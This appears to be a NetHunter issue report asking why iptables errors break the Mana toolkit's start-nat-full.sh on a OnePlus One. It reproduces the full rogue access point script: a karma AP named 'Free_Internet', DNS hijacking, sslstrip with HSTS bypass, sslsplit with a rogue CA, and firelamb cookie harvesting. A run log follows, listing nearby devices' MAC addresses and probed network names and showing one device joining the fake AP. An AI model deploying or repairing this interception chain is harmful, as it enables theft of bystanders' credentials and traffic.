Mana toolkit ip tables error
Important: Before opening an issue, did you check on the NetHunter Forum to see if this has already been discussed on it?
Link is: https://forums.kali.org/forumdisplay.php?14-NetHunter-Forums
Device: One plus 1
Oneplus1
OS version (KitKat/Lollipop/Marshmallow/Nougat): Marshmallow 6.01 cm13 kalinethunter build from buildscript
6.01
Built from repo (date and build command) or downloaded from website (links): both
build with nethunter-fs and downloaded from site, so both
Issue:
almost everything works but the iptables give an error. something with 1.8 i post a screen about it. so because of that is if another device connects. their wifi icon has an ''!'' mark
Expected behavior:
That i can use start-nat-full without any problems
Any idea on where to look at?
i guess the ip tables
Screenshots (Optional)
**this is my dhcp.conf **
# dhcpd.conf
#
# Sample configuration file for ISC dhcpd
#
# option definitions common to all supported networks...
option domain-name "example.org";
option domain-name-servers ns1.example.org, ns2.example.org;
default-lease-time 600;
max-lease-time 7200;
# The ddns-updates-style parameter controls whether or not the server will
# attempt to do a DNS update when a lease is confirmed. We default to the
# behavior of the version 2 packages ('none', since DHCP v2 didn't
# have support for DDNS.)
ddns-update-style none;
# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
#authoritative;
# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
#log-facility local7;
# No service will be given on this subnet, but declaring it helps the
# DHCP server to understand the network topology.
#subnet 10.152.187.0 netmask 255.255.255.0 {
#}
# This is a very basic subnet declaration.
#subnet 10.254.239.0 netmask 255.255.255.224 {
# range 10.254.239.10 10.254.239.20;
# option routers rtr-239-0-1.example.org, rtr-239-0-2.example.org;
#}
# This declaration allows BOOTP clients to get dynamic addresses,
# which we don't really recommend.
#subnet 10.254.239.32 netmask 255.255.255.224 {
# range dynamic-bootp 10.254.239.40 10.254.239.60;
# option broadcast-address 10.254.239.31;
# option routers rtr-239-32-1.example.org;
#}
# A slightly different configuration for an internal subnet.
#subnet 10.5.5.0 netmask 255.255.255.224 {
# range 10.5.5.26 10.5.5.30;
# option domain-name-servers ns1.internal.example.org;
# option domain-name "internal.example.org";
# option routers 10.5.5.1;
# option broadcast-address 10.5.5.31;
# default-lease-time 600;
# max-lease-time 7200;
#}
# Hosts which require special configuration options can be listed in
# host statements. If no address is specified, the address will be
# allocated dynamically (if possible), but the host-specific information
# will still come from the host declaration.
#host passacaglia {
# hardware ethernet 0:0:c0:5d:bd:95;
# filename "vmunix.passacaglia";
# server-name "toccata.example.com";
#}
# Fixed IP addresses can also be specified for hosts. These addresses
# should not also be listed as being available for dynamic assignment.
# Hosts for which fixed IP addresses have been specified can boot using
# BOOTP or DHCP. Hosts for which no fixed address is specified can only
# be booted with DHCP, unless there is an address range on the subnet
# to which a BOOTP client is connected which has the dynamic-bootp flag
# set.
#host fantasia {
# hardware ethernet 08:00:07:26:c0:a5;
# fixed-address fantasia.example.com;
#}
# You can declare a class of clients and then do address allocation
# based on that. The example below shows a case where all clients
# in a certain class get addresses on the 10.17.224/24 subnet, and all
# other clients get addresses on the 10.0.29/24 subnet.
#class "foo" {
# match if substring (option vendor-class-identifier, 0, 4) = "SUNW";
#}
#shared-network 224-29 {
# subnet 10.17.224.0 netmask 255.255.255.0 {
# option routers rtr-224.example.org;
# }
# subnet 10.0.29.0 netmask 255.255.255.0 {
# option routers rtr-29.example.org;
# }
# pool {
# allow members of "foo";
# range 10.17.224.10 10.17.224.250;
# }
# pool {
# deny members of "foo";
# range 10.0.29.10 10.0.29.230;
# }
#}
this is my start-nat-full.sh
upstream=wlan0
phy=wlan1
conf=/sdcard/nh_files/configs/hostapd-karma.conf
hostapd=/usr/lib/mana-toolkit/hostapd
echo '1' > /proc/sys/net/ipv4/ip_forward
rfkill unblock wlan
echo -- $phy: flushing interface --
ip addr flush dev $phy
echo -- $phy: setting ip --
ip addr add 10.0.0.1/24 dev $phy
echo -- $phy: starting the interface --
ip link set $phy up
echo -- $phy: setting route --
ip route add default via 10.0.0.1 dev $phy
Starting AP and DHCP
sed -i "s/^interface=.*$/interface=$phy/" $conf
$hostapd $conf &
sleep 5
dnsmasq -z -C /etc/mana-toolkit/dnsmasq-dhcpd.conf -i $phy -I lo
#dnsmasq -z -C /etc/mana-toolkit/dnsmasq-dhcpd.conf -i $phy -I lo
sleep 5
# Add fking rule to table 1006
for table in $(ip rule list | awk -F"lookup" '{print $2}');
do
DEF=`ip route show table $table|grep default|grep $upstream`
if ! [ -z "$DEF" ]; then
break
fi
done
ip route add 10.0.0.0/24 dev $phy scope link table $table
# RM quota from chains to avoid errors in iptable-save
# http://lists.netfilter.org/pipermail/netfilter-buglog/2013-October/002995.html
iptables -F bw_INPUT
iptables -F bw_OUTPUT
Save
iptables-save > /tmp/rules.txt
Flush
iptables --policy INPUT ACCEPT
iptables --policy FORWARD ACCEPT
iptables --policy OUTPUT ACCEPT
iptables -F
iptables -F -t nat
Masquerade
iptables -t nat -A POSTROUTING -o $upstream -j MASQUERADE
iptables -A FORWARD -i $phy -o $upstream -j ACCEPT
iptables -t nat -A PREROUTING -i $phy -p udp --dport 53 -j DNAT --to 10.0.0.1
SSLStrip with HSTS bypass
cd /usr/share/mana-toolkit/sslstrip-hsts/sslstrip2/
python sslstrip.py -l 10000 -a -w /var/lib/mana-toolkit/sslstrip.log&
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 80 -j REDIRECT --to-port 10000
cd /usr/share/mana-toolkit/sslstrip-hsts/dns2proxy/
python dns2proxy.py -i $phy&
cd -
SSLSplit
sslsplit -D -P -Z -S /var/lib/mana-toolkit/sslsplit -c /usr/share/mana-toolkit/cert/rogue-ca.pem -k /usr/share/mana-toolkit/cert/rogue-ca.key -O -l /var/lib/mana-toolkit/sslsplit-connect.log \
https 0.0.0.0 10443 \
http 0.0.0.0 10080 \
ssl 0.0.0.0 10993 \
tcp 0.0.0.0 10143 \
ssl 0.0.0.0 10995 \
tcp 0.0.0.0 10110 \
ssl 0.0.0.0 10465 \
tcp 0.0.0.0 10025&
iptables -t nat -A INPUT -i $phy -p tcp --destination-port 80 -j REDIRECT --to-port 10080
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 443 -j REDIRECT --to-port 10443
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 143 -j REDIRECT --to-port 10143
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 993 -j REDIRECT --to-port 10993
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 65493 -j REDIRECT --to-port 10993
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 465 -j REDIRECT --to-port 10465
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 25 -j REDIRECT --to-port 10025
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 995 -j REDIRECT --to-port 10995
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 110 -j REDIRECT --to-port 10110
# Start FireLamb
/usr/share/mana-toolkit/firelamb/firelamb.py -i $phy &
sleep 5
echo "Hit enter to kill me"
read
pkill dhcpd
pkill sslstrip
pkill sslsplit
pkill hostapd
pkill python
# Restore
# iptables-restore < /tmp/rules.txt
# rm /tmp/rules.txt
# Remove iface and routes
ip addr flush dev $phy
ip link set $phy down
AND this is the ERROR
``-- wlan1: flushing interface -- -- wlan1: setting ip -- --
wlan1: starting the interface -- -- wlan1: setting route --
Configuration file:
/sdcard/nh_files/configs/hostapd-karma.conf Using interface
wlan1 with hwaddr 00:11:22:33:44:00 and ssid
"Free_Internet" wlan1: interface state
UNINITIALIZED->ENABLED wlan1: AP-ENABLED MANA - Directed
probe request for foreign SSID 'FRITZ!Box 5490 OL' from
3c:22:fb:d5:91:f2 MANA - Directed probe request for foreign
SSID 'FRITZ!Box 5490 OL' from 3c:22:fb:d5:91:f2 MANA -
Directed probe request for foreign SSID 'FRITZ!Box 5490 OL'
from 3c:22:fb:d5:91:f2 iptables v1.8.7 (nf_tables): Could
not fetch rule set generation id: Invalid argument iptables
v1.8.7 (nf_tables): Could not fetch rule set generation id:
Invalid argument iptables v1.8.7 (nf_tables): Could not
fetch rule set generation id: Invalid argument iptables
v1.8.7 (nf_tables): Could not fetch rule set generation id:
Invalid argument iptables v1.8.7 (nf_tables): Could not
fetch rule set generation id: Invalid argument iptables
v1.8.7 (nf_tables): Could not fetch rule set generation id:
Invalid argument iptables v1.8.7 (nf_tables): Could not
fetch rule set generation id: Invalid argument iptables
v1.8.7 (nf_tables): Could not fetch rule set generation id:
Invalid argument iptables v1.8.7 (nf_tables): Could not
fetch rule set generation id: Invalid argument iptables
v1.8.7 (nf_tables): unknown option "--dport" Try `iptables
-h' or 'iptables --help' for more information. iptables
v1.8.7 (nf_tables): unknown option "--destination-port" Try
`iptables -h' or 'iptables --help' for more information.
/usr/share/mana-toolkit/sslstrip-hsts/sslstrip2 Traceback
(most recent call last):
File "sslstrip.py", line 27, in <module> from twisted.web
import http
ImportError: No module named twisted.web
| Warning: -F requires a privileged operation for each
| connection! Privileged operations require communication
| between parent and child process and will negatively
| impact latency and performance on each connection.
SSLsplit 0.5.5 (built 2019-11-13) Copyright (c) 2009-2019,
Daniel Roethlisberger <daniel@roe.ch>
https://www.roe.ch/SSLsplit Build info: V:FILE HDIFF:0
N:83c4edf Features: -DHAVE_NETFILTER NAT engines:
netfilter* tproxy netfilter: IP_TRANSPARENT
IP6T_SO_ORIGINAL_DST Local process info support: no
compiled against OpenSSL 1.1.1d 10 Sep 2019 (1010104f)
rtlinked against OpenSSL 1.1.1j 16 Feb 2021 (101010af)
OpenSSL has support for TLS extensions TLS Server Name
Indication (SNI) supported OpenSSL is thread-safe with
THREADID OpenSSL has engine support Using
SSL_MODE_RELEASE_BUFFERS SSL/TLS protocol availability:
tls10 tls11 tls12 SSL/TLS algorithm availability: !SHA0 RSA
DSA ECDSA DH ECDH EC OpenSSL option availability:
SSL_OP_NO_COMPRESSION SSL_OP_NO_TICKET
SSL_OP_ALLOW_UNSAFE_LEGACY_RENEGOTIATION
SSL_OP_DONT_INSERT_EMPTY_FRAGMENTS
SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION
SSL_OP_TLS_ROLLBACK_BUG compiled against libevent
2.1.11-stable rtlinked against libevent 2.1.12-stable
compiled against libnet 1.1.6 rtlinked against libnet 1.1.6
compiled against libpcap n/a rtlinked against libpcap
1.10.0 (with TPACKET_V3) 4 CPU cores detected Traceback
(most recent call last):
File "dns2proxy.py", line 21, in <module> import
dns.message
ImportError: No module named dns.message iptables v1.8.7
(nf_tables): unknown option "--destination-port" Try
`iptables -h' or 'iptables --help' for more information.
iptables v1.8.7 (nf_tables): unknown option
"--destination-port" Try `iptables -h' or 'iptables --help'
for more information. iptables v1.8.7 (nf_tables): unknown
option "--destination-port" Try `iptables -h' or 'iptables
--help' for more information. iptables v1.8.7 (nf_tables):
unknown option "--destination-port" Try `iptables -h' or
'iptables --help' for more information. iptables v1.8.7
(nf_tables): unknown option "--destination-port" Try
`iptables -h' or 'iptables --help' for more information.
iptables v1.8.7 (nf_tables): unknown option
"--destination-port" Try `iptables -h' or 'iptables --help'
for more information. iptables v1.8.7 (nf_tables): unknown
option "--destination-port" Try `iptables -h' or 'iptables
--help' for more information. iptables v1.8.7 (nf_tables):
unknown option "--destination-port" Try `iptables -h' or
'iptables --help' for more information. Traceback (most
recent call last):
File "/usr/share/mana-toolkit/firelamb/firelamb.py", line
7, in <module>
from scapy.all import * ImportError: No module named
scapy.all Generated 2048 bit RSA key for leaf certs.
SSL/TLS protocol: negotiate proxyspecs: - [0.0.0.0]:10025
tcp netfilter - [0.0.0.0]:10465 ssl netfilter -
[0.0.0.0]:10110 tcp netfilter - [0.0.0.0]:10995 ssl
netfilter - [0.0.0.0]:10143 tcp netfilter - [0.0.0.0]:10993
ssl netfilter - [0.0.0.0]:10080 tcp|http netfilter -
[0.0.0.0]:10443 ssl|http netfilter Loaded CA:
'/C=ZA/ST=Gauteng/L=Pretoria/O=SensePost/OU=MANA/CN=MANA/emailAddress=research@sensepost.com'
SSL/TLS leaf certificates taken from: - Generated on the
fly Privsep fastpath disabled Created self-pipe [r=5,w=6]
Created chld-pipe [r=7,w=8] Created socketpair 0 [p=9,c=10]
Created socketpair 1 [p=11,c=12] Created socketpair 2
[p=13,c=14] Created socketpair 3 [p=15,c=16] Created
socketpair 4 [p=17,c=18] Created socketpair 5 [p=19,c=20]
Privsep parent pid 10150 Privsep child pid 10191 Using
libevent backend 'epoll' Event base supports: edge yes,
O(1) yes, anyfd no Received privsep req type 03 sz 5 on
srvsock 9 Received privsep req type 03 sz 5 on srvsock 9
Received privsep req type 03 sz 5 on srvsock 9 Received
privsep req type 03 sz 5 on srvsock 9 Received privsep req
type 03 sz 5 on srvsock 9 Received privsep req type 03 sz 5
on srvsock 9 Received privsep req type 03 sz 5 on srvsock 9
Received privsep req type 03 sz 5 on srvsock 9 Dropped
privs to user nobody group - chroot - Received privsep req
type 00 sz 1 on srvsock 9 Received privsep req type 00 sz 1
on srvsock 11 Inserted events:
0xb740cf00 [fd 6] Read Persist Internal 0xb740d01c [fd 8]
Read Persist Internal 0xb740d39c [fd 9] Read
PersistReceived privsep req type 00 sz 1 on srvsock 17
Received privsep req type 00 sz 1 on srvsock 19 0xb740d404
[fd 11] Read Persist 0xb740d47c [fd 13] Read Persist
0xb740e34c [fd 15] Read Persist 0xb740e3dc [fd 17] Read
Persist 0xb740e46c [fd 19] Read Persist 0xb740e4fc [fd
21] Read Persist 0xb740e58c [fd 22] Read Persist
0xb7406b18 [sig 1] Signal Persist 0xb7406b90 [sig 2]
Signal Persist 0xb7406938 [sig 3] Signal Persist
0xb740e8e0 [sig 10] Signal Persist 0xb740a4d0 [sig 13]
Signal Persist 0xb74068a0 [sig 15] Signal Persist
0xb740e9d8 [fd -1] Persist Timeout=1615293068.246311
Active events: Initialized 8 connection handling threads
Started 8 connection handling threads Starting main event
loop. Hit enter to kill me MANA - Directed probe request
for foreign SSID 'W-LAN USB Hub' from 00:24:44:2d:ed:c5
MANA - Directed probe request for foreign SSID 'W-LAN USB
Hub' from 00:24:44:2d:ed:c5 MANA - Directed probe request
for foreign SSID 'cap-eindhoven-1' from 58:48:22:f0:58:ca
MANA - Directed probe request for actual/legitimate SSID
'Free_Internet' from 88:83:22:dc:b2:81 MANA - Directed
probe request for actual/legitimate SSID 'Free_Internet'
from 88:83:22:dc:b2:81 MANA - Directed probe request for
actual/legitimate SSID 'Free_Internet' from
88:83:22:dc:b2:81 MANA - Directed probe request for
actual/legitimate SSID 'Free_Internet' from
88:83:22:dc:b2:81 MANA - Directed probe request for
actual/legitimate SSID 'Free_Internet' from
88:83:22:dc:b2:81 wlan1: STA 88:83:22:dc:b2:81 IEEE 802.11:
authenticated wlan1: STA 88:83:22:dc:b2:81 IEEE 802.11:
associated (aid 1) wlan1: AP-STA-CONNECTED
88:83:22:dc:b2:81 Garbage collecting caches started.
Garbage collecting caches done. MANA - Directed probe
request for foreign SSID 'H369AC1908D' from
3c:a9:f4:18:f2:74 MANA - Directed probe request for foreign
SSID 'FRITZ!Box 5490 OL' from 3c:22:fb:d5:91:f2 MANA -
Directed probe request for foreign SSID 'FRITZ!Box 5490 OL'
from 3c:22:fb:d5:91:f2 MANA - Directed probe request for
foreign SSID 'honeypot' from 04:d6:aa:4c:16:fe Garbage
collecting caches started. Garbage collecting caches done.
MANA - Directed probe request for foreign SSID
'H369AC1908D' from 3c:a9:f4:18:f2:74 MANA - Attempting to
generated Broadcast response : H369AC1908D (11) for STA
3c:a9:f4:18:f2:74 MANA - Directed probe request for foreign
SSID 'FRITZ!Box 5490 OL' from 3c:22:fb:d5:91:f2 MANA -
Directed probe request for foreign SSID 'FRITZ!Box 5490 OL'
from 3c:22:fb:d5:91:f2 MANA - Directed probe request for
foreign SSID 'FRITZ!Box 5490 OL' from 3c:22:fb:d5:91:f2
MANA - Directed probe request for foreign SSID 'FRITZ!Box
5490 OL' from 3c:22:fb:d5:91:f2 Received signal 15 Main
event loop stopped (reason=15). Child pid 10191 killed by
signal 15 wlan1: AP-STA-DISCONNECTED 88:83:22:dc:b2:81
I hope you guys can help me out. thanks
Edited by bvdx199